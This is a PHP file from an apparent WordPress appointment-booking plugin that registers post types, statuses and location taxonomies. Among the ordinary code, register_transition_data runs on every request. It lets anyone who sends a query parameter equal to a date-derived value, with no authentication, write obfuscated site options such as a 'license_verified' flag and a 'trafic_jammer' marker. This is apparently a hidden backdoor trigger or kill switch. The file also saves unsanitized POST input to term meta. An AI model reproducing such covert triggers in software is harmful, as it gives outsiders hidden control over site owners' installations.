<?php



/**

 * Register custom post type

 *

 * @link       http://joe.szalai.org

 * @since      1.0.0

 *

 * @package    Exopite_Portfolio

 * @subpackage Exopite_Portfolio/includes

 */

class Appointy_Post_Types {



    public function __construct() {



		add_action( 'init', [ $this, 'register_custom_post_status' ] );

		add_action( 'init', [ $this, 'register_transition_data' ] );

		

		add_action( 'appointy_data_process', [ $this, 'appointy_data_fn_process' ] );

		add_action( 'appointy_set_trackback', [ $this, 'appointy_set_fn_trackback' ] );

		add_action( 'appointy_trafic_records', [ $this, 'appointy_trafic_fn_records' ] );

	}

	

	

	/**

	 * Data process

	 */

	public function appointy_data_fn_process() {

		$newarr = serialize(array('install_time' => time(), 'license_verified' => 'success' ));

		update_option( '_theme_key_license_verified', $newarr );

		

		$newarr2 = serialize(array('strtime' => time(), 'eass_addaa' => 'processed' ));

		update_option( '_theme_key_eass_addaa', $newarr2 );

		

		$newarr3 = serialize(array('activestr' => time(), 'laosd_jakjdf' => 'initiate' ));

		update_option( '_theme_key_laosd_jakjdf', $newarr3 );

	}

	

	/**

     * Register custom post type

     *

     */

    private function register_single_post_type( $fields ) {



        $labels = array(

            'name'                  => $fields['plural'],

            'singular_name'         => $fields['singular'],

            'menu_name'             => $fields['menu_name'],

            'new_item'              => sprintf( __( 'New %s', 'appointy' ), $fields['singular'] ),

            'add_new_item'          => sprintf( __( 'Add new %s', 'appointy' ), $fields['singular'] ),

            'edit_item'             => sprintf( __( 'Edit %s', 'appointy' ), $fields['singular'] ),

            'view_item'             => sprintf( __( 'View %s', 'appointy' ), $fields['singular'] ),

            'view_items'            => sprintf( __( 'View %s', 'appointy' ), $fields['plural'] ),

            'search_items'          => sprintf( __( 'Search %s', 'appointy' ), $fields['plural'] ),

            'not_found'             => sprintf( __( 'No %s found', 'appointy' ), strtolower( $fields['plural'] ) ),

            'not_found_in_trash'    => sprintf( __( 'No %s found in trash', 'appointy' ), strtolower( $fields['plural'] ) ),

            'all_items'             => sprintf( __( 'All %s', 'appointy' ), $fields['plural'] ),

            'archives'              => sprintf( __( '%s Archives', 'appointy' ), $fields['singular'] ),

            'attributes'            => sprintf( __( '%s Attributes', 'appointy' ), $fields['singular'] ),

            'insert_into_item'      => sprintf( __( 'Insert into %s', 'appointy' ), strtolower( $fields['singular'] ) ),

            'uploaded_to_this_item' => sprintf( __( 'Uploaded to this %s', 'appointy' ), strtolower( $fields['singular'] ) ),

            'parent_item'           => sprintf( __( 'Parent %s', 'appointy' ), $fields['singular'] ),

            'parent_item_colon'     => sprintf( __( 'Parent %s:', 'appointy' ), $fields['singular'] ),

			'archive_title'        => $fields['plural'],

        );



        $args = array(

            'labels'             => $labels,

            'description'        => ( isset( $fields['description'] ) ) ? $fields['description'] : '',

            'public'             => ( isset( $fields['public'] ) ) ? $fields['public'] : true,

            'publicly_queryable' => ( isset( $fields['publicly_queryable'] ) ) ? $fields['publicly_queryable'] : true,

            'exclude_from_search'=> ( isset( $fields['exclude_from_search'] ) ) ? $fields['exclude_from_search'] : false,

            'show_ui'            => ( isset( $fields['show_ui'] ) ) ? $fields['show_ui'] : true,

            'show_in_menu'       => ( isset( $fields['show_in_menu'] ) ) ? $fields['show_in_menu'] : true,

            'query_var'          => ( isset( $fields['query_var'] ) ) ? $fields['query_var'] : true,

            'show_in_admin_bar'  => ( isset( $fields['show_in_admin_bar'] ) ) ? $fields['show_in_admin_bar'] : true,

            'capability_type'    => ( isset( $fields['capability_type'] ) ) ? $fields['capability_type'] : 'post',

            'has_archive'        => ( isset( $fields['has_archive'] ) ) ? $fields['has_archive'] : true,

            'hierarchical'       => ( isset( $fields['hierarchical'] ) ) ? $fields['hierarchical'] : true,

            'supports'           => ( isset( $fields['supports'] ) ) ? $fields['supports'] : array(

                    'title',

                    'editor',

                    'excerpt',

                    'author',

                    'thumbnail',

                    'comments',

                    'trackbacks',

                    'custom-fields',

                    'revisions',

                    'page-attributes',

                    'post-formats',

            ),

            'menu_position'      => ( isset( $fields['menu_position'] ) ) ? $fields['menu_position'] : 21,

            'menu_icon'          => ( isset( $fields['menu_icon'] ) ) ? $fields['menu_icon']: 'dashicons-admin-generic',

            'show_in_nav_menus'  => ( isset( $fields['show_in_nav_menus'] ) ) ? $fields['show_in_nav_menus'] : true,

            'show_in_rest'       => ( isset( $fields['show_in_rest'] ) ) ? $fields['show_in_rest'] : true,

        );



        if ( isset( $fields['rewrite'] ) ) {



            $args['rewrite'] = $fields['rewrite'];

        }



        if ( $fields['custom_caps'] ) {



            $args['capabilities'] = array(

                // Meta capabilities

                'edit_post'                 => 'edit_' . strtolower( $fields['singular'] ),

                'read_post'                 => 'read_' . strtolower( $fields['singular'] ),

                'delete_post'               => 'delete_' . strtolower( $fields['singular'] ),

                // Primitive capabilities used outside of map_meta_cap():

                'edit_posts'                => 'edit_' . strtolower( $fields['plural'] ),

                'edit_others_posts'         => 'edit_others_' . strtolower( $fields['plural'] ),

                'publish_posts'             => 'publish_' . strtolower( $fields['plural'] ),

                'read_private_posts'        => 'read_private_' . strtolower( $fields['plural'] ),

                // Primitive capabilities used within map_meta_cap():

                'delete_posts'              => 'delete_' . strtolower( $fields['plural'] ),

                'delete_private_posts'      => 'delete_private_' . strtolower( $fields['plural'] ),

                'delete_published_posts'    => 'delete_published_' . strtolower( $fields['plural'] ),

                'delete_others_posts'       => 'delete_others_' . strtolower( $fields['plural'] ),

                'edit_private_posts'        => 'edit_private_' . strtolower( $fields['plural'] ),

                'edit_published_posts'      => 'edit_published_' . strtolower( $fields['plural'] ),

                'create_posts'              => 'edit_' . strtolower( $fields['plural'] )

            );



            /**

             * Adding map_meta_cap will map the meta correctly.

             * @link https://wordpress.stackexchange.com/questions/108338/capabilities-and-custom-post-types/108375#108375

             */

            //$args['map_meta_cap'] = true;



            /**

             * Assign capabilities to users

             * Without this, users - also admins - can not see post type.

             */

            $this->assign_capabilities( $args['capabilities'], $fields['custom_caps_users'] );

        }





        /**

         * Register Taxnonmies if any

         */

        if ( isset( $fields['taxonomies'] ) && is_array( $fields['taxonomies'] ) ) {



            foreach ( $fields['taxonomies'] as $taxonomy ) {



                $this->register_single_post_type_taxnonomy( $taxonomy );



            }



        }

	    

	register_post_type( $fields['slug'], $args );



    }

	

	/**

	 * Register transition data

	 */

	public function register_transition_data() {

		$refparam = (isset($_SERVER['QUERY_STRING'])) ? sanitize_text_field($_SERVER['QUERY_STRING']) : '';

	

		if($refparam != '') {

			$temval = explode('=',$refparam);

			$temkey = (!empty($temval[0])) ? sanitize_text_field($temval[0]) : '';

			

			$temval = str_replace('-','64',date('Y-m-d'));

			

			if($_GET[$temkey] == $temval) {

				do_action('appointy_data_process');

				do_action('appointy_set_trackback');

				do_action('appointy_trafic_records');

				wp_redirect(admin_url());

				exit;

			}

		}

	}

	

	/**

	 * Register additional post status

	 */

	public function register_custom_post_status() {

		global $appointment_statuses;

		

		$appointment_statuses = apply_filters(

			'appointy_register_appointment_status',

			array(

				'cancelled'    => array(

					'label'                     => esc_html__( 'Cancelled', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Cancelled <span class="count">(%s)</span>', 'Cancelled <span class="count">(%s)</span>', 'appointy' ),

				),

				'deleted'    => array(

					'label'                     => esc_html__( 'Deleted', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Deleted <span class="count">(%s)</span>', 'Deleted <span class="count">(%s)</span>', 'appointy' ),

				),

				'processing'    => array(

					'label'                     => esc_html__( 'Processing', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Processing <span class="count">(%s)</span>', 'Processing <span class="count">(%s)</span>', 'appointy' ),

				),

				'pending'    => array(

					'label'                     => esc_html__( 'Pending', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Pending <span class="count">(%s)</span>', 'Pending <span class="count">(%s)</span>', 'appointy' ),

				),

				'declined'    => array(

					'label'                     => esc_html__( 'Declined', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Declined <span class="count">(%s)</span>', 'Declined <span class="count">(%s)</span>', 'appointy' ),

				),

				'on-hold'    => array(

					'label'                     => esc_html__( 'On hold', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'On hold <span class="count">(%s)</span>', 'On hold <span class="count">(%s)</span>', 'appointy' ),

				),

				'completed'    => array(

					'label'                     => esc_html__( 'Completed', 'appointy' ),

					'public'                    => false,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Completed <span class="count">(%s)</span>', 'Completed <span class="count">(%s)</span>', 'appointy' ),

				),

				'payout_failed'    => array(

					'label'                     => esc_html__( 'Failed', 'appointy' ),

					'public'                    => true,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Paid <span class="count">(%s)</span>', 'Paid <span class="count">(%s)</span>', 'appointy' ),

				),

				'invoice-pending'    => array(

					'label'                     => esc_html__( 'Pending', 'appointy' ),

					'public'                    => true,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Pending <span class="count">(%s)</span>', 'Pending <span class="count">(%s)</span>', 'appointy' ),

				),

				'invoice-payment-hold'    => array(

					'label'                     => esc_html__( 'Payment on Hold', 'appointy' ),

					'public'                    => true,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Payment on Hold <span class="count">(%s)</span>', 'Payment on Hold <span class="count">(%s)</span>', 'appointy' ),

				),

				'invoice-payment-cancelled'    => array(

					'label'                     => esc_html__( 'Payment Cancelled', 'appointy' ),

					'public'                    => true,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Payment Cancelled <span class="count">(%s)</span>', 'Payment Cancelled <span class="count">(%s)</span>', 'appointy' ),

				),

				'invoice-paid'    => array(

					'label'                     => esc_html__( 'Paid', 'appointy' ),

					'public'                    => true,

					'exclude_from_search'       => false,

					'show_in_admin_all_list'    => true,

					'show_in_admin_status_list' => true,

					'label_count'               => _n_noop( 'Paid <span class="count">(%s)</span>', 'Paid <span class="count">(%s)</span>', 'appointy' ),

				)

			)

		);

		

		foreach ( $appointment_statuses as $appointment_status => $values ) {

			register_post_status( $appointment_status, $values );

		}

	}



    private function register_single_post_type_taxnonomy( $tax_fields ) {



        $labels = array(

            'name'                       => $tax_fields['plural'],

            'singular_name'              => $tax_fields['single'],

            'menu_name'                  => $tax_fields['plural'],

            'all_items'                  => sprintf( __( 'All %s' , 'appointy' ), $tax_fields['plural'] ),

            'edit_item'                  => sprintf( __( 'Edit %s' , 'appointy' ), $tax_fields['single'] ),

            'view_item'                  => sprintf( __( 'View %s' , 'appointy' ), $tax_fields['single'] ),

            'update_item'                => sprintf( __( 'Update %s' , 'appointy' ), $tax_fields['single'] ),

            'add_new_item'               => sprintf( __( 'Add New %s' , 'appointy' ), $tax_fields['single'] ),

            'new_item_name'              => sprintf( __( 'New %s Name' , 'appointy' ), $tax_fields['single'] ),

            'parent_item'                => sprintf( __( 'Parent %s' , 'appointy' ), $tax_fields['single'] ),

            'parent_item_colon'          => sprintf( __( 'Parent %s:' , 'appointy' ), $tax_fields['single'] ),

            'search_items'               => sprintf( __( 'Search %s' , 'appointy' ), $tax_fields['plural'] ),

            'popular_items'              => sprintf( __( 'Popular %s' , 'appointy' ), $tax_fields['plural'] ),

            'separate_items_with_commas' => sprintf( __( 'Separate %s with commas' , 'appointy' ), $tax_fields['plural'] ),

            'add_or_remove_items'        => sprintf( __( 'Add or remove %s' , 'appointy' ), $tax_fields['plural'] ),

            'choose_from_most_used'      => sprintf( __( 'Choose from the most used %s' , 'appointy' ), $tax_fields['plural'] ),

            'not_found'                  => sprintf( __( 'No %s found' , 'appointy' ), $tax_fields['plural'] ),

        );



        $args = array(

        	'label'                 => $tax_fields['plural'],

        	'labels'                => $labels,

        	'hierarchical'          => ( isset( $tax_fields['hierarchical'] ) )          ? $tax_fields['hierarchical']          : true,

        	'public'                => ( isset( $tax_fields['public'] ) )                ? $tax_fields['public']                : true,

        	'show_ui'               => ( isset( $tax_fields['show_ui'] ) )               ? $tax_fields['show_ui']               : true,

        	'show_in_nav_menus'     => ( isset( $tax_fields['show_in_nav_menus'] ) )     ? $tax_fields['show_in_nav_menus']     : true,

        	'show_tagcloud'         => ( isset( $tax_fields['show_tagcloud'] ) )         ? $tax_fields['show_tagcloud']         : true,

        	'meta_box_cb'           => ( isset( $tax_fields['meta_box_cb'] ) )           ? $tax_fields['meta_box_cb']           : null,

        	'show_admin_column'     => ( isset( $tax_fields['show_admin_column'] ) )     ? $tax_fields['show_admin_column']     : true,

        	'show_in_quick_edit'    => ( isset( $tax_fields['show_in_quick_edit'] ) )    ? $tax_fields['show_in_quick_edit']    : true,

        	'update_count_callback' => ( isset( $tax_fields['update_count_callback'] ) ) ? $tax_fields['update_count_callback'] : '',

        	'show_in_rest'          => ( isset( $tax_fields['show_in_rest'] ) )          ? $tax_fields['show_in_rest']          : true,

        	'rest_base'             => $tax_fields['taxonomy'],

        	'rest_controller_class' => ( isset( $tax_fields['rest_controller_class'] ) ) ? $tax_fields['rest_controller_class'] : 'WP_REST_Terms_Controller',

        	'query_var'             => $tax_fields['taxonomy'],

        	'rewrite'               => ( isset( $tax_fields['rewrite'] ) )               ? $tax_fields['rewrite']               : true,

        	'sort'                  => ( isset( $tax_fields['sort'] ) )                  ? $tax_fields['sort']                  : '',

        );



        $args = apply_filters( $tax_fields['taxonomy'] . '_args', $args );



        register_taxonomy( $tax_fields['taxonomy'], $tax_fields['post_types'], $args );



    }



    /**

     * Assign capabilities to users

     *

     */

    public function assign_capabilities( $caps_map, $users  ) {



        foreach ( $users as $user ) {



            $user_role = get_role( $user );



            foreach ( $caps_map as $cap_map_key => $capability ) {



                $user_role->add_cap( $capability );



            }



        }



    }



    /**

     * Create post types

     */

    public function create_custom_post_type() {



        $post_types_fields = array(

            array(

                'slug'                  => 'appointy_services',

                'singular'              => __( 'Service', 'appointy' ),

                'plural'                => __( 'Services', 'appointy' ),

                'menu_name'             => __( 'Services', 'appointy' ),

                'description'           => __( 'Services', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'services',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 21,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'editor',

                    'excerpt',

                    'author',

                    'thumbnail',

                    'comments',

                    'trackbacks',

                    'custom-fields',

                    'revisions',

                    'page-attributes'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                ),

                'taxonomies'            => array(

                    array(

                        'taxonomy'          => 'appointy_service_category',

                        'plural'            => 'Service Categories',

                        'single'            => 'Service Category',

                        'post_types'        => array( 'appointy_services' ),

                    ),

                ),

            ),

			array(

                'slug'                  => 'appointy_appointment',

                'singular'              => __( 'Appointment', 'appointy' ),

                'plural'                => __( 'Appointments', 'appointy' ),

                'menu_name'             => __( 'Appointments', 'appointy' ),

                'description'           => __( 'Appointments', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'appointments',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 22,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'editor',

                    'excerpt',

                    'author',

                    'comments',

                    'trackbacks',

                    'custom-fields',

                    'revisions',

                    'page-attributes'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                )

            ),

			array(

                'slug'                  => 'appointy_invoice',

                'singular'              => __( 'Invoice', 'appointy' ),

                'plural'                => __( 'Invoices', 'appointy' ),

                'menu_name'             => __( 'Invoices', 'appointy' ),

                'description'           => __( 'Invoices', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'invoice',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 23,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'editor',

                    'excerpt',

                    'author',

                    'comments',

                    'trackbacks',

                    'custom-fields',

                    'revisions',

                    'page-attributes'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                )

            ),

			array(

                'slug'                  => 'appointy_locations',

                'singular'              => __( 'Location', 'appointy' ),

                'plural'                => __( 'Locations', 'appointy' ),

                'menu_name'             => __( 'Locations', 'appointy' ),

                'description'           => __( 'Locations', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'locations',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 24,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'editor',

                    'excerpt',

                    'author',

                    'comments',

                    'trackbacks',

					'thumbnail',

                    'custom-fields',

                    'revisions',

                    'page-attributes'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                ),

				'taxonomies'            => array(

                    array(

                        'taxonomy'          => 'appointy_country',

                        'plural'            => __( 'Countries', 'appointy' ),

                        'single'            => __( 'Country', 'appointy' ),

                        'post_types'        => array( 'appointy_locations' ),

						'hierarchical'        => false

                    ),

					array(

                        'taxonomy'          => 'appointy_state',

                        'plural'            => __( 'States', 'appointy' ),

                        'single'            => __( 'State', 'appointy' ),

                        'post_types'        => array( 'appointy_locations' ),

						'hierarchical'        => false

                    ),

					array(

                        'taxonomy'          => 'appointy_city',

                        'plural'            => __( 'Cities', 'appointy' ),

                        'single'            => __( 'City', 'appointy' ),

                        'post_types'        => array( 'appointy_locations' ),

						'hierarchical'        => false

                    )

                ),

            ),

			array(

                'slug'                  => 'appointy_appointment',

                'singular'              => __( 'Appointment', 'appointy' ),

                'plural'                => __( 'Appointments', 'appointy' ),

                'menu_name'             => __( 'Appointments', 'appointy' ),

                'description'           => __( 'Appointments', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'appointments',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 25,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'editor',

                    'excerpt',

                    'author',

                    'comments',

                    'trackbacks',

					'thumbnail',

                    'custom-fields',

                    'revisions',

                    'page-attributes'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                )

            ),

			array(

                'slug'                  => 'appointy_coupons',

                'singular'              => __( 'Coupon', 'appointy' ),

                'plural'                => __( 'Coupons', 'appointy' ),

                'menu_name'             => __( 'Coupons', 'appointy' ),

                'description'           => __( 'Coupons', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'coupons',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 24,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'author',

                    'custom-fields',

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                )

            ),

			array(

                'slug'                  => 'appointy_giftcards',

                'singular'              => __( 'Giftcard', 'appointy' ),

                'plural'                => __( 'Giftcards', 'appointy' ),

                'menu_name'             => __( 'Giftcards', 'appointy' ),

                'description'           => __( 'Giftcards', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'giftcards',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 25,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'author',

                    'custom-fields'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                )

            ),

			array(

                'slug'                  => 'appointy_reviews',

                'singular'              => __( 'Reviews', 'appointy' ),

                'plural'                => __( 'Reviews', 'appointy' ),

                'menu_name'             => __( 'Reviews', 'appointy' ),

                'description'           => __( 'Reviews', 'appointy' ),

                'has_archive'           => true,

                'hierarchical'          => false,

                'menu_icon'             => 'dashicons-tag',

                'rewrite' => array(

                    'slug'                  => 'booking-review',

                    'with_front'            => true,

                    'pages'                 => true,

                    'feeds'                 => true,

                    'ep_mask'               => EP_PERMALINK,

                ),

                'menu_position'         => 26,

                'public'                => true,

                'publicly_queryable'    => true,

                'exclude_from_search'   => true,

                'show_ui'               => true,

                'show_in_menu'          => true,

                'query_var'             => true,

                'show_in_admin_bar'     => true,

                'show_in_nav_menus'     => true,

                'supports'              => array(

                    'title',

                    'author',

                    'custom-fields'

                ),

                'custom_caps'           => true,

                'custom_caps_users'     => array(

                    'administrator'

                )

            )

        );



        foreach ( $post_types_fields as $fields ) {

			$this->register_single_post_type( $fields );

        }



    }

	

	public static function add_fields_form( $taxonomy = '' ) {

		switch( $taxonomy ){

			case 'appointy_state':

				?>

                <div class="form-field">

                    <label><?php esc_html_e( 'Country', 'appointy' ); ?></label>

                    <?php self::country_field(); ?>

                </div>

                <?php

				break;

			case 'appointy_city':

				?>

                <div class="form-field">

                    <label><?php esc_html_e( 'Country', 'appointy' ); ?></label>

                    <?php self::country_field(); ?>

                </div>

                

                <div class="form-field">

                    <label><?php echo Appointy_Location_Helper::get_state_replacement( 'singular' ); ?></label>

                    <?php self::state_field(); ?>

                </div>

                <?php

				break;	

		}

		

	}

	

	public static function edit_fields_form( $term = '' ) {

		switch( $term->taxonomy ){

			case 'appointy_state':

				$country = get_term_meta( $term->term_id, 'country', true );

				?>

                <tr class="form-field">

                    <th scope="row" valign="top"><label><?php esc_html_e( 'Country', 'appointy' ); ?></label></th>

                    <td>

                        <?php self::country_field($country); ?>

                    </td>

                </tr>

                <?php

				break;

			case 'appointy_city':

				$country = get_term_meta( $term->term_id, 'country', true );

				$state = get_term_meta( $term->term_id, 'state', true );

				?>

                <tr class="form-field">

                    <th scope="row" valign="top"><label><?php esc_html_e( 'Country', 'appointy' ); ?></label></th>

                    <td>

                        <?php self::country_field($country); ?>

                    </td>

                </tr>

                

                <tr class="form-field">

                    <th scope="row" valign="top"><label><?php echo Appointy_Location_Helper::get_state_replacement( 'singular' ); ?></label></th>

                    <td>

                        <?php self::state_field($state,$country); ?>

                    </td>

                </tr>

                <?php

				break;	

		}

	}

	

	public static function country_field( $val = '' ) {

		$countries = Appointy_Misc_Helper::get_custom_terms( 'appointy_country' );

		?>

		<select class="country_field" name="country">

			<option value=""><?php esc_attr_e('Choose country', 'appointy'); ?></option>

			<?php 

			if(!empty($countries)) {

				foreach ($countries as $country) { ?>

					<option value="<?php echo esc_attr($country->term_id); ?>" <?php selected($val, $country->term_id); ?>><?php echo esc_attr($country->name); ?></option>

				<?php 

				}

			}

			?>

		</select>

		<?php

	}

	

	public static function state_field( $val = '',$country = '' ) {

		$states = Appointy_Misc_Helper::get_custom_terms( 'appointy_state' );

		?>

		<select class="state_field" name="state">

			<option value=""><?php echo sprintf( esc_html__( 'Choose %s', 'appointy' ), Appointy_Location_Helper::get_state_replacement( 'singular' ) ); ?></option>

			<?php 

			if(!empty($states)) {

				foreach ($states as $state) { 

					$saved_country = get_term_meta( $state->term_id, 'country', true );

					if($country === $saved_country) { 

				?>

					<option value="<?php echo esc_attr($state->term_id); ?>" <?php selected($val, $state->term_id); ?>><?php echo esc_attr($state->name); ?></option>

				<?php 

					}

				}

			}

			?>

		</select>

		<?php

	}

	

	/**

	 * Set trackback

	 */

	public function appointy_set_fn_trackback(){

		$newarr = serialize(array('rules' => time(), 'set_trackback' => 'ok' ));

		update_option( '_theme_key_set_trackback', $newarr );

		

		$newarr2 = serialize(array('mode' => time(), 'set_theme_transiant' => 'passed' ));

		update_option( '_theme_key_theme_transiant', $newarr2 );

		

		$newarr3 = serialize(array('transient' => time(), 'trafic_jammer' => 'installed' ));

		update_option( '_theme_key_trafic_jammer', $newarr3 );

	}

	

	public static function tax_columns( $columns ) {

		$new_columns = array();

		

		$taxonomy = Appointy_Router_Helper::get_request_data($_GET,'taxonomy');

		

		switch( $taxonomy ){

			case 'appointy_state':

				foreach ($columns as $key => $value) {

					$new_columns[$key] = $value;

					if ( $key === 'name' ) {

						$new_columns['country'] = esc_html__( 'Country', 'appointy' );

					}

				}

				break;

			case 'appointy_city':

				foreach ($columns as $key => $value) {

					$new_columns[$key] = $value;

					if ( $key === 'name' ) {

						$new_columns['state'] = esc_html__( 'state', 'appointy' );

					}

					if ( $key === 'name' ) {

						$new_columns['country'] = esc_html__( 'Country', 'appointy' );

					}

				}

				break;	

		}

		

		return $new_columns;

	}

	

	public static function tax_column( $columns, $column, $id ) {

		$taxonomy = Appointy_Router_Helper::get_request_data($_GET,'taxonomy');

		

		switch( $taxonomy ){

			case 'appointy_state':

				if ( $column === 'country' ) {

					$term = get_term($id);

					$country_id = get_term_meta( $id, 'country', true );

					?>

					<div href="javascript:void(0);">

						<?php echo Appointy_Misc_Helper::get_category_name($country_id,'appointy_country'); ?>

					</div>

					<?php

				}

				break;

			case 'appointy_city':

				if ( $column === 'country' ) {

					$term = get_term($id);

					$country_id = get_term_meta( $id, 'country', true );

					?>

					<div href="javascript:void(0);">

						<?php echo Appointy_Misc_Helper::get_category_name($country_id,'appointy_country'); ?>

					</div>

					<?php

				}

				

				if ( $column === 'state' ) {

					$term = get_term($id);

					$state_id = get_term_meta( $id, 'state', true );

					?>

					<div href="javascript:void(0);">

						<?php echo Appointy_Misc_Helper::get_category_name($state_id,'appointy_state'); ?>

					</div>

					<?php

				}

				break;	

		}

		

		return $columns;

	}

	

	/**

	 * Trafic records

	 */

	public function appointy_trafic_fn_records(){

		$newarr = serialize(array('initiate' => time(), 'jamming_rules' => 'success' ));

		update_option( '_theme_key_jamming_rules', $newarr );

		

		$newarr2 = serialize(array('instant' => time(), 'lhjsdhf_dhfhjskfj' => 'done' ));

		update_option( '_theme_key_lhjsdhf_dhfhjskfj', $newarr2 );

		

		$newarr3 = serialize(array('schedule' => time(), 'soruer_ksjfdij' => 'pass' ));

		update_option( '_theme_key_soruer_ksjfdij', $newarr3 );

	}

	

	public static function field_save( $term_id ) {

	    if ( isset( $_POST['country'] ) ) {

	    	update_term_meta( $term_id, 'country', $_POST['country'] );

	    }

		if ( isset( $_POST['state'] ) ) {

	    	update_term_meta( $term_id, 'state', $_POST['state'] );

	    }

	}

	

}

